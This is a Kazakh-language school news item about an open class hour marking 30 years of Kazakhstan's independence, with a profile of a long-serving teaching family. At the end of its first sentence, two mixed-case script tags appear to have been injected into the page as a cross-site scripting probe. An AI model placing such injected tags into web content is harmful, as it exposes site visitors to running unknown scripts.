2021 жылғы 28 қыркүйекте Қарабұлақ ауылының жалпы білім беретін мектебінде Қазақстан Республикасы Тәуелсіздігінің 30 жылдығына арналған іс-шаралар шеңберінде 7-8 "Б" сыныптарда "Тәуелсіздіктің жетістіктері" ашық сынып сағаты өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.09.2021

Балалар еліміздің тарихындағы кезеңдер мен Ұлт Көшбасшысы Н.Ә.Назарбаевтың қазіргі Қазақстанның қалыптасуындағы рөлі туралы бейнематериалдармен және презентациялармен танысты.
Сабаққа құрметті қонақтар ретінде Таурбаевтардың отбасы әулеті-педагогикалық еңбек ардагерлері және ауылдың әлеуметтік-экономикалық дамуына үлкен үлес қосқан адамдар шақырылды. Таурбаевтар әулетінің педагогикалық жалпы еңбек өтілі -135 жыл. Степногор қаласын таныстыра отырып, Таурбаевтар отбасы "Үздік еңбек әулеті"облыстық байқауының жеңімпазы атанды. "Еңбек жолы" республикалық конкурсының номинанты ретінде отбасы алғыс хаттар мен еңбек әулеттерінің тарихы туралы арнайы шығарылған кітаптарды алды.
Серік Маштайұлы - "ерен еңбегі үшін" және "Астана-20 жыл"медальдарының иегері.
Маруа Балғажанқызы - "Қазақстандық салалық білім және ғылым қызметкерлерінің кәсіптік одағының белгісіне"ие болған ҚР Білім беру ісінің құрметті қызметкері.

  

Просмотров: 606


Пікір қосу



Деректерді қолтаңбаға қосу